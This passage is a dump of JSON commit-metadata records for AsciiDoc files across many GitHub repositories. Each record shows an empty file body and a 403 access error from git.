{"commit":"12b065e5ab3182c086c2397e7d221f308c756f26","subject":"Update 2016-06-03-gi.adoc","message":"Update 2016-06-03-gi.adoc","repos":"chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io","old_file":"_posts\/2016-06-03-gi.adoc","new_file":"_posts\/2016-06-03-gi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chdask\/chdask.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ea9a3c94f241a4e51e25e9d5f1132eec700efa1","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec0597f6dfb5b9b26b4888cdab793a54e53bb251","subject":"Link from Objects to Syntax","message":"Link from Objects to Syntax\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6aa10b2938afedf0d0c7735527f94af2d05c7a93","subject":"Minor","message":"Minor\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/JSF.adoc","new_file":"Best practices\/JSF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be50e1f54c29f27f4a978ed8bd65d0cb040079a0","subject":"y2b create post 12 Speaker Headphones = MIND BLOWN","message":"y2b create post 12 Speaker Headphones = MIND BLOWN","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-28-12-Speaker-Headphones--MIND-BLOWN.adoc","new_file":"_posts\/2016-10-28-12-Speaker-Headphones--MIND-BLOWN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50cfc25e3d50d7b2d5ef2a76ab25b9126301365e","subject":"docs update v0.8.4","message":"docs update v0.8.4\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"016c730255558319de697c60eafa7069e7ab1c97","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02fe823fad58eba758addd07e44e36f96dde8724","subject":"Update 2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","message":"Update 2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","new_file":"_posts\/2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a5b41fa24775d4a07275f27c31c3d792c8a00e2","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3e11f7ded6f279b644017365c018a111a0f22cb","subject":"Update 2019-03-18-.adoc","message":"Update 2019-03-18-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-18-.adoc","new_file":"_posts\/2019-03-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18fd6b0a0b60051f63d82ed648c83795bd61f8b1","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e09eeea38c2ffa5b9e5531ed4d35700633cb5df3","subject":"Create payment_control_plugin.adoc","message":"Create payment_control_plugin.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/payment_control_plugin.adoc","new_file":"userguide\/tutorials\/payment_control_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3886c53cc7e682d723391d042da431d290d91a34","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58bf8f1f6d180254f68371509043cad01422d0c8","subject":"Wording again","message":"Wording again\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"433f1a8a9a6b6f4a8236a387c5d9851eab0fe3bd","subject":"Update 2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","message":"Update 2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","new_file":"_posts\/2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f219fbd3269cd623336b329fe3c4c528b8d86c8c","subject":"Small Debian\/Ubuntu docs fix.","message":"Small Debian\/Ubuntu docs fix.\n\nUpdate the Debian\/Ubuntu build documentation to list the xsltproc\ndependency and use the package for asciidoctor.\n\nChange-Id: I7dbe469ea23f6729ca43b392853b313ac0fd78aa\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1090\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4116bcc52897eda14b086f61280516108175707e","subject":"Update 2012-11-17-Joystick-Mouse-com-Teensy.adoc","message":"Update 2012-11-17-Joystick-Mouse-com-Teensy.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2012-11-17-Joystick-Mouse-com-Teensy.adoc","new_file":"_posts\/2012-11-17-Joystick-Mouse-com-Teensy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ebe74002db0cfc7fd08eee647cf3e59461930b","subject":"Update 2017-08-15-focus-within-pseudo-class.adoc","message":"Update 2017-08-15-focus-within-pseudo-class.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-08-15-focus-within-pseudo-class.adoc","new_file":"_posts\/2017-08-15-focus-within-pseudo-class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ea24e0c2c2774b352ee45b5b2dacf938687517e","subject":"initial authorization docs","message":"initial authorization docs\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_openshift\/authorization.adoc","new_file":"using_openshift\/authorization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84c4491d26ddb0affeb65a8b156f7edd22174ab2","subject":"added readmefile to library","message":"added readmefile to library\n","repos":"MalmoUniversity-DA366A\/calvin-arduino,MalmoUniversity-DA366A\/calvin-arduino,MalmoUniversity-DA366A\/calvin-arduino","old_file":"CalvinLibrary\/CalvinMini\/README.adoc","new_file":"CalvinLibrary\/CalvinMini\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MalmoUniversity-DA366A\/calvin-arduino.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47a881982dedb43b3cd061529812a4dd8eddc833","subject":"Update README.adoc","message":"Update README.adoc","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"yet-another-docker-its\/README.adoc","new_file":"yet-another-docker-its\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaaa19fc0d41a78ef1000f7a05bd32482de1cd88","subject":"Update 2018-05-09-Test-blog-entry.adoc","message":"Update 2018-05-09-Test-blog-entry.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"295cc0cf3a938cd1ddc7f4ceaa0f1b07e0c918fb","subject":"#17 #23 Update terminal commands and description","message":"#17 #23 Update terminal commands and description","repos":"imadLamari\/carto_teach_planning,imadLamari\/carto_teach_planning","old_file":"docs\/install.adoc","new_file":"docs\/install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/imadLamari\/carto_teach_planning.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"555d61a34041f4489457c6a165f6c92b1ff9b767","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e53c3e4662a522223957c99b7790bde015b0c20b","subject":"Update 2015-11-27-Button.adoc","message":"Update 2015-11-27-Button.adoc","repos":"hfluz\/hfluz.github.io,hfluz\/hfluz.github.io,hfluz\/hfluz.github.io","old_file":"_posts\/2015-11-27-Button.adoc","new_file":"_posts\/2015-11-27-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hfluz\/hfluz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d61d5c983e6847799e7f0115b92120687de5e8d9","subject":"Update 2017-01-25 Test asciidoc.adoc","message":"Update 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec0a1b2db60b95b62fc5288b8c25a060e01a6906","subject":"Update 2016-07-24-Wprowadzenie.adoc","message":"Update 2016-07-24-Wprowadzenie.adoc","repos":"kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm","old_file":"_posts\/2016-07-24-Wprowadzenie.adoc","new_file":"_posts\/2016-07-24-Wprowadzenie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kornel661\/blog-test-jm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5e53e2dd562c5c483364e204d9abbd7c8488cb","subject":"Update 2017-10-19-Inyector-DLL.adoc","message":"Update 2017-10-19-Inyector-DLL.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82ccc24bbe6bbc62f7cef8294f1c30ed01fdb1f","subject":"Initial singleton doc.","message":"Initial singleton doc.\n","repos":"cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,xtuml\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc","old_file":"doc\/notes\/mc-3020-singleton.adoc","new_file":"doc\/notes\/mc-3020-singleton.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10fe2bc75ef690cd248e4f156b294bd10e3eca45","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730dcffe6dccccb0b71336862c9fca915428248f","subject":"Fix crossrefs in footnotes","message":"Fix crossrefs in footnotes\n","repos":"Peter32\/spring-security,mrkingybc\/spring-security,ajdinhedzic\/spring-security,mounb\/spring-security,chinazhaoht\/spring-security,spring-projects\/spring-security,pkdevbox\/spring-security,diegofernandes\/spring-security,vitorgv\/spring-security,fhanik\/spring-security,wkorando\/spring-security,follow99\/spring-security,adairtaosy\/spring-security,izeye\/spring-security,hippostar\/spring-security,jmnarloch\/spring-security,djechelon\/spring-security,mparaz\/spring-security,fhanik\/spring-security,raindev\/spring-security,panchenko\/spring-security,xingguang2013\/spring-security,Krasnyanskiy\/spring-security,rwinch\/spring-security,zhaoqin102\/spring-security,wilkinsona\/spring-security,likaiwalkman\/spring-security,panchenko\/spring-security,driftman\/spring-security,zshift\/spring-security,cyratech\/spring-security,wilkinsona\/spring-security,mparaz\/spring-security,yinhe402\/spring-security,rwinch\/spring-security,MatthiasWinzeler\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,hippostar\/spring-security,SanjayUser\/SpringSecurityPro,yinhe402\/spring-security,caiwenshu\/spring-security,tekul\/spring-security,MatthiasWinzeler\/spring-security,mounb\/spring-security,zshift\/spring-security,jmnarloch\/spring-security,xingguang2013\/spring-security,raindev\/spring-security,chinazhaoht\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,thomasdarimont\/spring-security,liuguohua\/spring-security,zhaoqin102\/spring-security,follow99\/spring-security,tekul\/spring-security,mrkingybc\/spring-security,ollie314\/spring-security,eddumelendez\/spring-security,ractive\/spring-security,hippostar\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,vitorgv\/spring-security,Xcorpio\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,wkorando\/spring-security,panchenko\/spring-security,zhaoqin102\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,follow99\/spring-security,likaiwalkman\/spring-security,izeye\/spring-security,xingguang2013\/spring-security,forestqqqq\/spring-security,pkdevbox\/spring-security,liuguohua\/spring-security,Xcorpio\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,ajdinhedzic\/spring-security,Peter32\/spring-security,adairtaosy\/spring-security,mdeinum\/spring-security,spring-projects\/spring-security,cyratech\/spring-security,izeye\/spring-security,fhanik\/spring-security,olezhuravlev\/spring-security,ajdinhedzic\/spring-security,ractive\/spring-security,jmnarloch\/spring-security,thomasdarimont\/spring-security,fhanik\/spring-security,adairtaosy\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,vitorgv\/spring-security,ollie314\/spring-security,wkorando\/spring-security,driftman\/spring-security,driftman\/spring-security,pkdevbox\/spring-security,cyratech\/spring-security,panchenko\/spring-security,Krasnyanskiy\/spring-security,spring-projects\/spring-security,Xcorpio\/spring-security,diegofernandes\/spring-security,pkdevbox\/spring-security,pwheel\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,zgscwjm\/spring-security,forestqqqq\/spring-security,adairtaosy\/spring-security,izeye\/spring-security,raindev\/spring-security,mrkingybc\/spring-security,caiwenshu\/spring-security,driftman\/spring-security,diegofernandes\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,follow99\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,mounb\/spring-security,caiwenshu\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,wilkinsona\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,mrkingybc\/spring-security,ractive\/spring-security,rwinch\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,SanjayUser\/SpringSecurityPro,Krasnyanskiy\/spring-security,chinazhaoht\/spring-security,xingguang2013\/spring-security,wilkinsona\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,zshift\/spring-security,olezhuravlev\/spring-security,cyratech\/spring-security,tekul\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,zgscwjm\/spring-security,Peter32\/spring-security,likaiwalkman\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,tekul\/spring-security,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,thomasdarimont\/spring-security,caiwenshu\/spring-security,Peter32\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,mdeinum\/spring-security,vitorgv\/spring-security,fhanik\/spring-security,ractive\/spring-security,zhaoqin102\/spring-security,mparaz\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,chinazhaoht\/spring-security,spring-projects\/spring-security,raindev\/spring-security,jmnarloch\/spring-security,likaiwalkman\/spring-security,kazuki43zoo\/spring-security,Krasnyanskiy\/spring-security,spring-projects\/spring-security,hippostar\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aee113109eb646737f850280491c3d850d5d4171","subject":"Update 2015-10-30-Falcor.adoc","message":"Update 2015-10-30-Falcor.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-10-30-Falcor.adoc","new_file":"_posts\/2015-10-30-Falcor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4e488564750987d70a69c3f8ca2f2d011392c48","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d5159a7b0377dc538b591fc58134f14fab7ee60","subject":"Update 2017-03-25-Treffen-am-24-Marz-2017.adoc","message":"Update 2017-03-25-Treffen-am-24-Marz-2017.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2017-03-25-Treffen-am-24-Marz-2017.adoc","new_file":"_posts\/2017-03-25-Treffen-am-24-Marz-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4848f1056adbebe32bc99a0319e37746afb1c0e","subject":"Revert \"Delete the file at '_posts\/2017-06-22-why_activation_function.adoc'\"","message":"Revert \"Delete the file at '_posts\/2017-06-22-why_activation_function.adoc'\"\n\nThis reverts commit 7a7f6d2b30f52702b13426fd2cf0daf6d8a659db.\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-22-why_activation_function.adoc","new_file":"_posts\/2017-06-22-why_activation_function.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2f6c0f3f6f68f1d0481783a08e0354c9a48c4ab","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80f1653fc9708272dc7904932388f6665b0fa492","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22c8cea1944a592b50e852df3daa2651bc970f4d","subject":"Tweak description for web fraction (#652)","message":"Tweak description for web fraction 